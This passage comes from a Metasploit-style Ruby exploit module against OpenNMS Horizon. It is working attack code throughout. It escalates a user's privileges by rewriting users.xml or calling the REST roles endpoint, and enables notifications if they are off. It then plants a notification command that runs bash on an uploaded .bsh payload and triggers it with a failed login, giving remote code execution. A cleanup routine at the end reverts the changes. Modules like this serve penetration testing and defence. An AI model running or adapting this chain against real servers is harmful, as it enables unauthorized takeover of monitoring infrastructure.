'disconnected') end # when using the filesystem endpoint to obtain the users.xml file, the root element is userinfo, which contains the users element if file_name == users_file if filesystem filesystem_root_element = 'userinfo' else filesystem_root_element = 'users' end else filesystem_root_element = root_element end unless res.code == 200 && res.body.strip.end_with?("</#{filesystem_root_element}>") return deal_with_failure_by_mode(mode, "Unexpected response received while attempting to obtain the #{file_name} file. User #{username} my lack the required privileges.", 'unexpected_reply') end # Parse the file begin doc = Nokogiri::XML(res.body) elements = doc&.at_css(root_element)&.css(element)&.map { |e| e&.text } rescue Nokogiri::XML::SyntaxError => e return deal_with_failure_by_mode(mode, "Failed to parse the #{file_name} file: #{e}", 'unexpected_reply') end if elements.blank? return deal_with_failure_by_mode(mode, "No #{element} elements were found in the #{file_name} file.", 'unexpected_reply') end [true, doc] end # This method is used to obtain the privileges of a user from the users.xml file # # @param xml_doc [Nokogiri::XML::Document] The XML document containing the users # @param mode [String] The mode to use: check, exploit or cleanup # @return [Array] An array containing a boolean and a CheckCode, message, or an array of privileges def grab_user_privs(xml_doc, mode) privileges = [] begin user = xml_doc&.at_css('users')&.css('user')&.find { |u| u.at_css('user-id')&.text == username } if user.blank? return deal_with_failure_by_mode(mode, "Failed to parse the users.xml file. User #{username} was not found.", 'unexpected_reply') end privileges = user.css('role')&.map { |r| r&.text } if privileges.blank? return deal_with_failure_by_mode(mode, "Failed to parse the users.xml file. No roles were found for user #{username}.", 'unexpected_reply') end rescue Nokogiri::XML::SyntaxError => e return deal_with_failure_by_mode(mode, "Failed to parse the users.xml file: #{e}", 'unexpected_reply') end vprint_status("User #{username} has the following privileges: #{privileges.join(' ')}") [true, privileges] end # This method is used to escalate or deescalate privileges # # @param deescalate [Boolean] Whether to escalate or deescalate privileges # @return [Array] An array containing a boolean and a CheckCode or message def escalate_or_deescalate_privs(deescalate: false) # Establish some variables based on if we need to escalate or deescalate privileges if deescalate use_filesystem = @role_to_add != 'ROLE_FILESYSTEM_EDITOR' mode = 'cleanup' else use_filesystem = @highest_priv == 'ROLE_FILESYSTEM_EDITOR' mode = 'exploit' end # grab and parse the users.xml file success, xml_doc_or_msg = grab_and_parse_xml_config_file(users_file, 'users', 'user', mode, filesystem: use_filesystem) return [false, xml_doc_or_msg] unless success # Get the privileges of the current user as a sanity check success, privileges_or_msg = grab_user_privs(xml_doc_or_msg, mode) return [false, privileges_or_msg] unless success # if we are here to remove privileges, check if we actually have the privileges we want to remove. return otherwise if deescalate && privileges_or_msg.exclude?(@role_to_add) return [false, 'Did not find the required privileges to deescalate. Manual cleanup may be required.'] end # if we need to escalate privileges, check if we already have the privileges we want to escalate to. return otherwise unless deescalate if use_filesystem if privileges_or_msg.include?('ROLE_ADMIN') || privileges_or_msg.include?('ROLE_REST') # We don't need to escalate privileges here @highest_priv = 'GOD' return [true] end @role_to_add = 'ROLE_ADMIN' else if privileges_or_msg.include?('ROLE_FILESYSTEM_EDITOR') # We don't need to escalate privileges here @highest_priv = 'GOD' return [true] end @role_to_add = 'ROLE_FILESYSTEM_EDITOR' end end # Add or remove the required role to the current user if use_filesystem # If we have ROLE_FILESYSTEM_EDITOR privileges, we can use the filesystem endpoint to add or remove the required role begin user = xml_doc_or_msg.at_css('users').css('user').find { |u| u.at_css('user-id')&.text == username } if user.blank? message = "Did not find the current user in the users.xml file while attempting to #{deescalate ? 'deescalate' : 'escalate'} privileges." return deal_with_failure_by_mode(mode, message, 'unexpected_reply') end if deescalate role = user.css('role').find { |r| r.text == @role_to_add } if role.blank? return [false, 'Failed to parse the users.xml file while attempting to deescalate privileges. Manual cleanup is required.'] end role.remove else user.add_child(xml_doc_or_msg.create_element('role', @role_to_add)) end rescue Nokogiri::XML::SyntaxError => e return deal_with_failure_by_mode(mode, "Failed to parse the users.xml file while attempting to #{deescalate ? 'deescalate' : 'escalate'} privileges: #{e}", 'unexpected_reply') end # upload the edited users.xml file via the filesystem endpoint success, message = upload_xml_config_file(users_file, generate_post_data(users_file, xml_doc_or_msg.to_xml(indent: 3)), mode) unless deescalate # If we have escalated privileges via the filesystem, we need to wait a few seconds for the changes to be saved print_status("Waiting #{privesc_save_delay} seconds for the changes to be saved...") sleep(privesc_save_delay) end return [false, message] unless success # this is only used for cleanup. for exploit this cannot happen else # If we do not have FILESYSTEM_EDITOR privileges, we can use the REST endpoint to do this # /users/{username}/roles/{rolename} with PUT to add a role and DELETE to remove a role res = send_request_cgi({ 'method' => deescalate ? 'DELETE' : 'PUT', 'uri' => normalize_uri(target_uri.path, 'rest', 'users', username, 'roles', @role_to_add), 'keep_cookies' => true }, 2) # for some reason the server does not send a response when this request is performed via Ruby, but it does tend to work. When sending the same request via Burp suite, the server did respond. # 204 = no content, 304 = not modified. 204 indicates success, 304 indicates that the role was already added/removed if res && ![204, 304].include?(res.code) return deal_with_failure_by_mode(mode, "Received unexpected reply while attempting to #{deescalate ? 'deescalate' : 'escalate'} privileges", 'unexpected_reply') end end # Get the users.xml file again to make sure our changes were saved success, xml_doc_or_msg = grab_and_parse_xml_config_file(users_file, 'users', 'user', mode, filesystem: use_filesystem) return [false, xml_doc_or_msg] unless success # this is only used for cleanup. for exploit this cannot happen # Get the privileges of the current user again to make sure our changes were saved success, privs_or_msg = grab_user_privs(xml_doc_or_msg, mode) return [false, privs_or_msg] unless success # Check if our changes were saved if deescalate if privs_or_msg.include?(@role_to_add) return [false, 'Failed to deescalate privileges. Manual cleanup is required.'] end return [true, "Successfully deescalated privileges by removing #{@role_to_add}"] end # If we are here, we are escalating privileges unless privs_or_msg.include?(@role_to_add) fail_with(Failure::UnexpectedReply, 'Failed to escalate privileges') end @highest_priv = 'GOD' [true, "Successfully escalated privileges by adding #{@role_to_add}"] end # This method is used to generate the XML document that will be used to add a notification command # # @param file_name [String] The name of the file to upload # @param xml_doc [Nokogiri::XML::Document] The XML document to upload # @return [Rex::MIME::Message] The post data def generate_post_data(file_name, data_to_write) post_data = Rex::MIME::Message.new post_data.add_part(data_to_write, 'text/xml', nil, "form-data; name=\"upload\"; filename=\"#{file_name}\"") post_data end # This method is used to upload an XML configuration file to the target # # @param file_name [String] The name of the file to upload # @param post_data [Rex::MIME::Message] The post data to upload # @param mode [String] The mode to use: exploit or cleanup # @return [Array] An array containing a boolean and an optional message def upload_xml_config_file(file_name, post_data, mode = 'exploit') # upload the edited notificationCommands.xml file res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'rest', 'filesystem', 'contents'), 'vars_get' => { 'f' => file_name }, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'keep_cookies' => true, 'data' => post_data.to_s }) unless res return deal_with_failure_by_mode(mode, "Connection failed while attempting to upload the #{file_name} file", 'disconnected') end unless res.code == 200 && res.body.include?('Successfully wrote to') return deal_with_failure_by_mode(mode, "Unexpected response received while attempting to upload the #{file_name} file", 'unexpected_reply') end [true] end def find_element_via_at_css(file_name) if [destination_paths_file, notifications_file].include?(file_name) return false end true end # This method is used to edit an XML configuration file # # @param file_name [String] The name of the file to edit # @param root_element [String] The name of the root element in the XML file # @param element [String] The name of the element to edit in the XML file def edit_xml_config_file(file_name, root_element, element) # First we need to get the current #{file_name} file, so we can edit our #{element_name} in it _success, xml_doc = grab_and_parse_xml_config_file(file_name, root_element, element, 'exploit') # update the xml document with a new element new_value = Rex::Text.rand_text_alpha(8..12) case file_name when notification_commands_file xml_doc = add_notification_command(xml_doc, new_value) when destination_paths_file xml_doc = add_destination_path(xml_doc, new_value) when notifications_file xml_doc = add_notification(xml_doc, new_value) end # upload the edited #{file_name} file via the filesystem endpoint upload_xml_config_file(file_name, generate_post_data(file_name, xml_doc.to_xml(indent: 3)), 'exploit') # generate global variables for cleanup case file_name when notification_commands_file @notification_command_name = new_value when destination_paths_file @destination_path_name = new_value when notifications_file @notification_name = new_value end # Get the #{file_name} file again to make sure our #{element_name} was edited _success, xml_doc = grab_and_parse_xml_config_file(file_name, root_element, element, 'exploit') # Check if our #{element_name} was edited if find_element_via_at_css(file_name) full_element = xml_doc.at_css(root_element).css(element).find { |e| e.at_css('name')&.text == new_value } else full_element = xml_doc.at_css(root_element).css(element).find { |e| e['name'] == new_value } end if full_element.blank? fail_with(Failure::UnexpectedReply, "Failed to verify that the #{file_name} file was successfully edited") end print_status("Successfully edited #{file_name}") end # This method is used to add a notification command to a Nokogiri XML document # # @param xml_doc [Nokogiri::XML::Document] The XML document to add the notification command to # @param notification_command_name [String] The name of the notification command to add # @return [Nokogiri::XML::Document] The updated XML document def add_notification_command(xml_doc, notification_command_name) # A notification command is a command that gets executed when a notification is triggered. We can use this to execute our payload. # Update the xml document with a new notification command notification_comment = Rex::Text.rand_text_alpha(6..10) notification_command = xml_doc.create_element('command', 'binary' => 'true') # Change binary attribute value if needed name = xml_doc.create_element('name', notification_command_name) execute = xml_doc.create_element('execute', '/usr/bin/bash') comment = xml_doc.create_element('comment', notification_comment) argument = xml_doc.create_element('argument', 'streamed' => 'false') argument_switch = xml_doc.create_element('substitution', "/usr/share/opennms/etc/#{@payload_file_name}") argument.add_child(argument_switch) notification_command.add_child(name) notification_command.add_child(execute) notification_command.add_child(comment) notification_command.add_child(argument) xml_doc.at_css('notification-commands').add_child(notification_command) xml_doc end # This method is used to add a destination path to a Nokogiri XML document # # @param xml_doc [Nokogiri::XML::Document] The XML document to add the destination path to # @param destination_path_name [String] The name of the destination path to add # @return [Nokogiri::XML::Document] The updated XML document def add_destination_path(xml_doc, destination_path_name) # A destination path points to a specific group or user that will receive a notification when a notification is triggered. # It also indicates which notification command should be executed when the notification is triggered. # We need to add a destination path that points to our notification command so that it gets executed when a notification is triggered. # Update the xml document with a new destination path destination_path = xml_doc.create_element('path', 'name' => destination_path_name) target = xml_doc.create_element('target') name = xml_doc.create_element('name', 'Admin') command = xml_doc.create_element('command', @notification_command_name) target.add_child(name) target.add_child(command) destination_path.add_child(target) xml_doc.at_css('destinationPaths').add_child(destination_path) xml_doc end # This method is used to add a notification to a Nokogiri XML document # # @param xml_doc [Nokogiri::XML::Document] The XML document to add the notification to # @param notification_name [String] The name of the notification to add # @return [Nokogiri::XML::Document] The updated XML document def add_notification(xml_doc, notification_name) # A notification is triggered when a specific event occurs, and can be configured to call a specific destination path. # We need to add a notification that will trigger our destination path so that our notification command gets executed. # Update the xml document with a new notification that will be triggered when a user fails to authenticate # since that is something we can easily trigger ourselves notification_message = Rex::Text.rand_text_alpha(6..10) notification = xml_doc.create_element('notification', 'name' => notification_name, 'status' => 'on') uei = xml_doc.create_element('uei', 'uei.opennms.org/internal/authentication/failure') # We need to add a rule for the IP. Let's use a negative comparison with a non-routable IP, which will always work (see RFC 5737) rule = xml_doc.create_element('rule', "IPADDR != '192.0.2.#{rand(0..255)}'") destination_path = xml_doc.create_element('destinationPath', @destination_path_name) text_message = xml_doc.create_element('text-message', notification_message) notification.add_child(uei) notification.add_child(rule) notification.add_child(destination_path) notification.add_child(text_message) xml_doc.at_css('notifications').add_child(notification) xml_doc end # This method is used to remove an element from an XML configuration file # # @param file_name [String] The name of the file to remove the element from # @param root_element [String] The name of the root element in the XML file # @param element [String] The name of the element to remove from the XML file # @param element_to_remove [String] The name of the element to remove from the XML file def revert_xml_config_file(file_name, root_element, element, element_to_remove) # First we need to get the current #{file_name} file, so we can remove our #{element_name} from it success, xml_doc_or_msg = grab_and_parse_xml_config_file(file_name, root_element, element, 'cleanup') unless success print_error(xml_doc_or_msg) return end begin if find_element_via_at_css(file_name) full_element = xml_doc_or_msg.at_css(root_element).css(element).find { |e| e.at_css('name')&.text == element_to_remove } else full_element = xml_doc_or_msg.at_css(root_element).css(element).find { |e| e['name'] == element_to_remove } end unless full_element.present? print_error("Failed to remove #{element_to_remove} from #{file_name}. Manual cleanup is required") return end full_element.remove rescue Nokogiri::XML::SyntaxError print_error("Failed to parse the #{file_name} file while attempting to remove #{element_to_remove}. Manual cleanup is required.") return end # generate post data post_data = generate_post_data(file_name, xml_doc_or_msg.to_xml(indent: 3)) success, message = upload_xml_config_file(file_name, post_data, 'cleanup') unless success print_error(message) return end # Get the #{file_name} file again to make sure our #{element_name} was removed success, xml_doc_or_msg = grab_and_parse_xml_config_file(file_name, root_element, element, 'cleanup') unless success print_error(xml_doc_or_msg) return end # Check if our #{element_name} was removed if xml_doc_or_msg.at_css(root_element).css(element).map { |e| e.at_css('name')&.text }.include?(element_to_remove) print_error("Failed to remove #{element_to_remove} from #{file_name}. Manual cleanup is required.") else vprint_status("Successfully removed #{element_to_remove} from #{file_name}") end end # This method is used to trigger a reload of the OpenNMS configuration # # @param mode [String] The mode to use: exploit or cleanup # @return [Array] An array containing a boolean and a message def update_configuration(mode) # We need to update the configuration in order for our changes to take effect xml_doc = Nokogiri::XML::Builder.new do |xml| xml.event('xmlns' => 'http://xmlns.opennms.org/xsd/event') do xml.uei('uei.opennms.org/internal/reloadDaemonConfig') xml.source('perl_send_event') xml.time(Time.now.strftime('%Y-%m-%dT%H:%M:%S%:z')) xml.host(Rex::Text.rand_text_alpha(8..12)) xml.parms do xml.parm do xml.parmName('daemonName') xml.value('Notifd', { 'type' => 'string', 'encoding' => 'text' }) end end end end res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'rest', 'events'), 'ctype' => 'application/xml', 'keep_cookies' => true, 'data' => xml_doc.to_xml(indent: 3) }) unless res message = 'Connection failed while attempting to update the configuration.' message += ' The cleanup changes have not been applied, but will be at the next config reload.' if mode == 'cleanup' return deal_with_failure_by_mode(mode, message, 'disconnected') end unless res.code == 202 message = 'Received unexpected response while attempting to update the configuration.' message += ' The cleanup changes have not been applied, but will be at the next config reload.' if mode == 'cleanup' return deal_with_failure_by_mode(mode, message, 'unexpected_reply') end [true, 'Successfully updated the configuration'] end # This method is used to write the payload to a .bsh file and trigger the notification # # @param cmd [String] The command to execute def write_payload_to_bsh_file(cmd) # We need to write our payload to a .bsh file so that it can be executed by the notification command post_data = generate_post_data(@payload_file_name, cmd) res1 = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'rest', 'filesystem', 'contents'), 'vars_get' => { 'f' => @payload_file_name }, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'keep_cookies' => true, 'data' => post_data.to_s }) unless res1 fail_with(Failure::Disconnected, 'Connection failed while attempting to upload the payload file') end unless res1.code == 200 && res1.body.include?('Successfully wrote to') fail_with(Failure::UnexpectedReply, 'Failed to upload the payload file') end # Get the payload file again to make sure it was uploaded successfully res2 = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'rest', 'filesystem', 'contents'), 'vars_get' => { 'f' => @payload_file_name }, 'keep_cookies' => true }) unless res2 fail_with(Failure::Disconnected, 'Connection failed while attempting to obtain the current payload file') end unless res2.code == 200 && res2.body == cmd fail_with(Failure::UnexpectedReply, 'Failed to verify that the payload file was successfully uploaded') end print_good("Successfully uploaded the payload to #{@payload_file_name}") @payload_written = true end def execute_command(cmd, _opts = {}) # Write the payload to a .bsh file write_payload_to_bsh_file(cmd) print_status('Triggering the notification to execute the payload') # Trigger the notification by performing a login attempt using random credentials success, message = opennms_login('exploit', perform_invalid_login: true) if success print_status(message) else print_error(message) end end # Horizon installs with notifications globally disabled by default. This exploit depends on notification being enabled # in order to obtain RCE. If notifications are disabled a user with administrative privileges is able to turn them on. # https://docs.opennms.com/horizon/30/operation/notifications/getting-started.html def ensure_notifications_enabled res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.jsp'), 'keep_cookies' => true }) fail_with(Failure::UnexpectedReply, 'Failed to determine if notifications were enabled') unless res if res.get_html_document.xpath('//i[contains(@title, \'Notices: On\')]').empty? vprint_status('Notifications are not enabled, meaning the target is not exploitable as is. Enabling notifications now...') res2 = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin', 'updateNotificationStatus'), 'keep_cookies' => true, 'vars_post' => { 'status' => 'on' } }) fail_with(Failure::UnexpectedReply, 'Failed to enable notifications') unless res2 && res2.redirect? && res2.redirection.to_s.end_with?('/index.jsp') end vprint_good('Notifications are enabled') end def exploit # Check if we need to escalate privileges if @highest_priv && @highest_priv != 'GOD' # This is not performed if the user has set FORCEEXPLOIT to true. In that case we'll just start the exploit chain and hope for the best. _success, msg = escalate_or_deescalate_privs print_good(msg) if msg.present? # _success will always be true here, otherwise we would have failed already end # Let's make sure we have a valid session by clearing the cookie jar and logging in again # This will also ensure that any new privileges we may have added are applied cookie_jar.clear _success, message = opennms_login('exploit') vprint_status(message) # _success will always be true here, otherwise we would have failed already # Check to ensure Notifications are turned on. If they are disabled, enable them. ensure_notifications_enabled # Generate a random payload file name @payload_file_name = "#{Rex::Text.rand_text_alpha(8..12)}.bsh".downcase # Add a notification command edit_xml_config_file(notification_commands_file, 'notification-commands', 'command') # Add a destination path edit_xml_config_file(destination_paths_file, 'destinationPaths', 'path') # Add a notification edit_xml_config_file(notifications_file, 'notifications', 'notification') # Update the configuration changes we made update_configuration('exploit') # Write the payload and trigger the notification execute_command(payload.encoded) end def cleanup return if [@payload_file_name, @notification_name, @destination_path_name, @notification_command_name, @role_to_add].all?(&:blank?) print_status('Attempting cleanup...') # to be on the safe side, we'll clear the cookie jar and log in again cookie_jar.clear success, message = opennms_login('cleanup') if success vprint_status(message) else print_error(message) return end # Delete the payload file if @payload_file_name.present? && @payload_written res = send_request_cgi({ 'method' => 'DELETE', 'uri' => normalize_uri(target_uri.path, 'rest', 'filesystem', 'contents'), 'vars_get' => { 'f' => @payload_file_name }, 'keep_cookies' => true }) unless res print_error("Connection failed while attempting to delete the payload file #{@payload_file_name}. Manual cleanup is required.") return end unless res.code == 200 && res.body.include?('Successfully deleted') print_error("Failed to delete the payload file #{@payload_file_name}. Manual cleanup is required.") return end vprint_good("Successfully deleted the payload file #{@payload_file_name}") end # Delete the notification revert_xml_config_file(notifications_file, 'notifications', 'notification', @notification_name) if @notification_name.present? # Delete the destination path revert_xml_config_file(destination_paths_file, 'destinationPaths', 'path', @destination_path_name) if @destination_path_name.present? # Delete the notification command revert_xml_config_file(notification_commands_file, 'notification-commands', 'command', @notification_command_name) if @notification_command_name.present? # Update the configuration changes we made success, message = update_configuration('cleanup') if success vprint_status(message) else print_error(message) end # Revert the privilege escalation if necessary if @role_to_add.present? success, message = escalate_or_deescalate_privs(deescalate: true) if success vprint_status(message) else print_error(message) end end end end </code></pre>